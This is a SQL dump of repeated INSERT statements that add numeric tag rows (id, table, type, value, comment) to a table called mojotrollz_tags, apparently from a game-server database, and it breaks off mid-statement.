INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12939, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12940, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12941, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12941, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12942, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12942, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12943, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12943, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12944, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12944, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12944, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12956, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12956, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12957, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12957, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12958, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12958, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12959, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12959, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12960, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12960, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12961, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12961, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12962, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12962, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12976, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12977, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12996, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12996, 1, 2, 1537, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12996, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12997, 1, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12997, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12998, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12999, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12999, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12999, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13000, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13000, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13016, 1, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13016, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13017, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13018, 1, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13018, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13019, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13019, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13020, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13020, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13020, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13021, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13021, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13021, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13022, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13022, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13022, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13036, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13036, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13036, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13076, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13076, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13078, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13078, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13078, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13079, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13079, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13079, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13080, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13080, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13080, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13081, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13082, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13084, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13084, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13085, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13085, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13086, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13086, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13086, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13087, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13088, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13088, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13088, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13089, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13089, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13089, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13096, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13096, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13096, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13097, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13097, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13097, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13098, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13099, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13099, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13099, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13116, 1, 1, 489, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13116, 1, 2, 3277, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13116, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13117, 1, 1, 489, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13117, 1, 2, 3277, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13117, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13118, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13118, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13136, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13137, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13137, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13137, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13138, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13138, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13138, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13139, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13139, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13139, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13140, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13140, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13140, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13141, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13141, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13141, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13142, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13142, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13142, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13143, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13143, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13143, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13144, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13144, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13144, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13145, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13145, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13145, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13146, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13146, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13146, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13147, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13147, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13147, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13148, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13149, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13150, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13151, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13151, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13151, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13152, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13152, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13152, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13153, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13153, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13153, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13154, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13154, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13154, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13155, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13157, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13157, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13158, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13158, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13159, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13159, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13160, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13160, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13160, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13161, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13161, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13161, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13176, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13176, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13176, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13177, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13177, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13178, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13179, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13179, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13179, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13180, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13180, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13180, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13181, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13181, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13181, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13196, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13196, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13196, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13197, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13197, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13197, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13216, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13216, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13216, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13217, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13217, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13218, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13218, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13218, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13219, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13219, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13220, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13220, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13221, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13236, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13236, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13236, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13256, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13257, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13257, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13257, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13276, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13276, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13276, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13277, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13277, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13278, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13278, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13279, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13280, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13280, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13280, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13282, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13282, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13282, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13283, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13283, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13284, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13284, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13284, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13285, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13285, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13285, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13296, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13296, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13296, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13297, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13297, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13297, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13298, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13298, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13298, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13299, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13299, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13299, 1, 30, 1, 